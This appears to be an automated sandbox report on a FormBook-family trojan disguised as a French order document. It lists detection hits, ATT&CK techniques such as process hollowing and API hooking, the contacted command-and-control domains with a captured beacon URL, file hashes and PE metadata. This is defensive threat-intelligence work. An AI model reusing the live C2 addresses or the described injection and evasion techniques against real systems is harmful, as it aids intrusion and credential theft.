Source: Yara match | File source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

Behavior Graph ID: 502021 | Sample: document de commande.scr | Start date: 13/10/2021 | Architecture: WINDOWS | Score: 100

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures

Process tree recovered from the graph (the rendered graph image itself is not reproduced):

• document de commande.exe (started)
  • Dropped file: C:\Users\...\document de commande.exe.log, ASCII
  • document de commande.exe (started)
    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe (injected)
      DNS/IP: www.casaruralesgranada.com 217.160.0.186, ports 49853, 80, ONEANDONE-ASBrauerstrasse48DE Germany; www.gaiaseyephotography.com; www.ecshopdemo.com
      Signatures: System process connects to network (likely due to code injection or exploit)
      • chkdsk.exe (started)
        Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe (started)
          • conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
document de commande.exe | 31% | Virustotal |
document de commande.exe | 23% | Metadefender |
document de commande.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
3.2.document de commande.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.casaruralesgranada.com/dn7r/?iR-Tzb=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vodW3MT/P4hK&qVV8Aj=6lIHIj6PDtc | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
www.yourherogarden.net/dn7r/ | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.casaruralesgranada.com | 217.160.0.186 | true | true | | unknown
www.ecshopdemo.com | unknown | unknown | true | | unknown
www.gaiaseyephotography.com | unknown | unknown | true | | unknown

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.casaruralesgranada.com/dn7r/?iR-Tzb=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vodW3MT/P4hK&qVV8Aj=6lIHIj6PDtc | true | Avira URL Cloud: safe | unknown
www.yourherogarden.net/dn7r/ | true | Avira URL Cloud: safe | low

                URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | | high
http://www.tiro.com | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | | high
http://www.goodfont.co.kr | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.collada.org/2005/11/COLLADASchema9Done | document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                                http://www.galapagosdesign.com/DPleasedocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers8document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.fonts.comdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.sandoll.co.krdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.urwpp.deDPleasedocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.zhongyicts.com.cndocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sakkal.comdocument de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown

                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
217.160.0.186 | www.casaruralesgranada.com | Germany | 8560 | ONEANDONE-AS Brauerstrasse 48 DE | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 502021
Start date: 13.10.2021
Start time: 14:26:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 26s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: document de commande.scr (renamed file extension from scr to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@3/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 15.2% (good quality ratio 14%)
• Quality average: 75.5%
• Quality standard deviation: 29.9%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 52
• Number of non-executed functions: 3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Excluded processes from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.203.141.148, 20.82.210.154, 8.247.248.249, 8.247.248.223, 8.247.244.249, 20.54.110.249, 40.112.88.60, 2.20.178.24, 2.20.178.33, 20.82.209.183
• Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big; too many NtAllocateVirtualMemory calls found

                                    Simulations

                                    Behavior and APIs

Time | Type | Description
14:27:17 | API Interceptor | 1x Sleep call for process: document de commande.exe modified

                                    Joe Sandbox View / Context

                                    IPs

Match | Associated Sample Name / URL | Detection | Context
217.160.0.186 | order 00912.exe | malicious | www.casaruralesgranada.com/dn7r/?CR-T=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vod8o8j/L6pK&iha4=sVV4_ZVPc

                                    Domains

Match | Associated Sample Name / URL | Detection | Context
www.casaruralesgranada.com | order 00912.exe | malicious | 217.160.0.186

                                    ASN

Match | Associated Sample Name / URL | Detection | Context
ONEANDONE-AS Brauerstrasse 48 DE | iAuPyHuUkk.exe | malicious | 217.160.0.226
ONEANDONE-AS Brauerstrasse 48 DE | vbc.exe | malicious | 217.160.0.17
ONEANDONE-AS Brauerstrasse 48 DE | justificante de la transfer.exe | malicious | 212.227.15.158
ONEANDONE-AS Brauerstrasse 48 DE | vURlUPQLT0.exe | malicious | 74.208.236.170
ONEANDONE-AS Brauerstrasse 48 DE | 82051082.exe | malicious | 213.171.195.105
ONEANDONE-AS Brauerstrasse 48 DE | 8205108.exe | malicious | 74.208.236.156
ONEANDONE-AS Brauerstrasse 48 DE | Lv9eznkydx.exe | malicious | 217.160.0.238
ONEANDONE-AS Brauerstrasse 48 DE | c9.dll | malicious | 87.106.18.141
ONEANDONE-AS Brauerstrasse 48 DE | 2e.dll | malicious | 87.106.18.141
ONEANDONE-AS Brauerstrasse 48 DE | a3.exe | malicious | 87.106.18.141
ONEANDONE-AS Brauerstrasse 48 DE | a04.dll | malicious | 87.106.18.141
ONEANDONE-AS Brauerstrasse 48 DE | 50.dll | malicious | 87.106.18.141
ONEANDONE-AS Brauerstrasse 48 DE | Quote -0071021.exe | malicious | 217.160.0.7
ONEANDONE-AS Brauerstrasse 48 DE | DHL SHIPMENT.HTML | malicious | 217.160.0.196
ONEANDONE-AS Brauerstrasse 48 DE | hwIILTIn0n.exe | malicious | 217.160.0.17
ONEANDONE-AS Brauerstrasse 48 DE | just.exe | malicious | 212.227.15.158
ONEANDONE-AS Brauerstrasse 48 DE | 2WK7SGkGVZ.exe | malicious | 74.208.236.156
ONEANDONE-AS Brauerstrasse 48 DE | 0n1pEFuGKC.exe | malicious | 74.208.236.145
ONEANDONE-AS Brauerstrasse 48 DE | VmbABLKNbD.exe | malicious | 74.208.236.108
ONEANDONE-AS Brauerstrasse 48 DE | Update-KB250-x86.exe | malicious | 74.208.5.20

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\document de commande.exe.log
Process: C:\Users\user\Desktop\document de commande.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                    Static File Info

                                    General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.841717396898349
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Win16/32 Executable Delphi generic (2074/23) 0.01%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: document de commande.exe
File size: 566272
MD5: 1823dce627d29f5d4985501267f7ad9f
SHA1: 1ce10042fccf2c8fcb2b0a93723f24b6c3b4ffb3
SHA256: c14ba2023f89dc57df157690e40042b8b090906257c59b6e5834b2212cd3142e
SHA512: 88421fa99979a5ed7d55a2dccffbb96af3e72539e5dba61bf7860d2321a2f79deb5e9aae65e3fb9e5a17998a60d87abbbdc7b0dc495c991b4a3813a2ef8edb72
SSDEEP: 12288:DMSSBQvlKxIhc8+PzqBpzZCRtDSybgO5Kdw06aDSBaEK:D0ByMstCvDS4h0dbDSB3
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Fea..............0.................. ........@.. ....................................@................................

                                    File Icon

Icon Hash: 00828e8e8686b000

                                    Static PE Info

                                    General

Entrypoint: 0x48b92e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x616546D1 [Tue Oct 12 08:26:57 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    fcom dword ptr [edx+00h]
                                    add bl, ah
                                    movsd
                                    add byte ptr [eax], al
                                    pop esp
                                    stc
                                    add byte ptr [eax], al
                                    pop ecx
                                    dec ebp
                                    add dword ptr [eax], eax
                                    push es
                                    mov byte ptr [F7630001h], al
                                    add dword ptr [eax], eax
                                    mov dword ptr [ebp+02h], ecx
                                    add byte ptr [ebp-5Ch], bl
                                    add al, byte ptr [eax]

                                    Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8b8dc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8c000 | 0x380 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8e000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x89a1c | 0x89c00 | False | 0.921428368875 | data | 7.85154838784 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x8c000 | 0x380 | 0x400 | False | 0.3759765625 | data | 2.86719403238 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8e000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x8c058 | 0x324 | data | |

                                    Imports

DLL | Import
mscoree.dll | _CorExeMain

                                    Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2018 - 2021
Assembly Version | 4.0.2.0
InternalName | TimeZo.exe
FileVersion | 4.0.2.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | Win Mixer
ProductVersion | 4.0.2.0
FileDescription | Win Mixer
OriginalFilename | TimeZo.exe

                                    Network Behavior

                                    TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2021 14:28:53.563572884 CEST | 49853 | 80 | 192.168.2.4 | 217.160.0.186
Oct 13, 2021 14:28:53.584919930 CEST | 80 | 49853 | 217.160.0.186 | 192.168.2.4
Oct 13, 2021 14:28:53.585025072 CEST | 49853 | 80 | 192.168.2.4 | 217.160.0.186
Oct 13, 2021 14:28:53.585150003 CEST | 49853 | 80 | 192.168.2.4 | 217.160.0.186
Oct 13, 2021 14:28:53.606367111 CEST | 80 | 49853 | 217.160.0.186 | 192.168.2.4
Oct 13, 2021 14:28:53.613244057 CEST | 80 | 49853 | 217.160.0.186 | 192.168.2.4
Oct 13, 2021 14:28:53.613272905 CEST | 80 | 49853 | 217.160.0.186 | 192.168.2.4
Oct 13, 2021 14:28:53.613290071 CEST | 80 | 49853 | 217.160.0.186 | 192.168.2.4
Oct 13, 2021 14:28:53.613624096 CEST | 49853 | 80 | 192.168.2.4 | 217.160.0.186
Oct 13, 2021 14:28:53.613663912 CEST | 49853 | 80 | 192.168.2.4 | 217.160.0.186
Oct 13, 2021 14:28:53.634888887 CEST | 80 | 49853 | 217.160.0.186 | 192.168.2.4

                                    UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2021 14:28:33.296647072 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 14:28:33.332494974 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Oct 13, 2021 14:28:53.538194895 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 14:28:53.560286999 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Oct 13, 2021 14:29:14.900739908 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Oct 13, 2021 14:29:14.924463987 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4

                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 13, 2021 14:28:33.296647072 CEST | 192.168.2.4 | 8.8.8.8 | 0x153c | Standard query (0) | www.ecshopdemo.com | A (IP address) | IN (0x0001)
Oct 13, 2021 14:28:53.538194895 CEST | 192.168.2.4 | 8.8.8.8 | 0xd0e3 | Standard query (0) | www.casaruralesgranada.com | A (IP address) | IN (0x0001)
Oct 13, 2021 14:29:14.900739908 CEST | 192.168.2.4 | 8.8.8.8 | 0x238 | Standard query (0) | www.gaiaseyephotography.com | A (IP address) | IN (0x0001)

                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 13, 2021 14:28:33.332494974 CEST | 8.8.8.8 | 192.168.2.4 | 0x153c | Name error (3) | www.ecshopdemo.com | none | none | A (IP address) | IN (0x0001)
Oct 13, 2021 14:28:53.560286999 CEST | 8.8.8.8 | 192.168.2.4 | 0xd0e3 | No error (0) | www.casaruralesgranada.com | | 217.160.0.186 | A (IP address) | IN (0x0001)
Oct 13, 2021 14:29:14.924463987 CEST | 8.8.8.8 | 192.168.2.4 | 0x238 | Name error (3) | www.gaiaseyephotography.com | none | none | A (IP address) | IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.casaruralesgranada.com

                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49853 | 217.160.0.186 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 13, 2021 14:28:53.585150003 CEST | 5475 | OUT | GET /dn7r/?iR-Tzb=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vodW3MT/P4hK&qVV8Aj=6lIHIj6PDtc HTTP/1.1
Host: www.casaruralesgranada.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 13, 2021 14:28:53.613244057 CEST | 5477 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 1271
Connection: close
Date: Wed, 13 Oct 2021 12:28:53 GMT
Server: Apache
X-Frame-Options: deny
                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'IONOSParkingES'
Oct 13, 2021 14:28:53.613272905 CEST | 5477 | IN |
                                    Data Ascii: + '/park.js">' + '<\/script>' ); </script> </body></html>


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
Function Name    Hook Type    New Data (first bytes of the patched prologue)
PeekMessageA     INLINE       0x48 0x8B 0xB8 0x84 0x4E 0xED
PeekMessageW     INLINE       0x48 0x8B 0xB8 0x8C 0xCE 0xED
GetMessageW      INLINE       0x48 0x8B 0xB8 0x8C 0xCE 0xED
GetMessageA      INLINE       0x48 0x8B 0xB8 0x84 0x4E 0xED
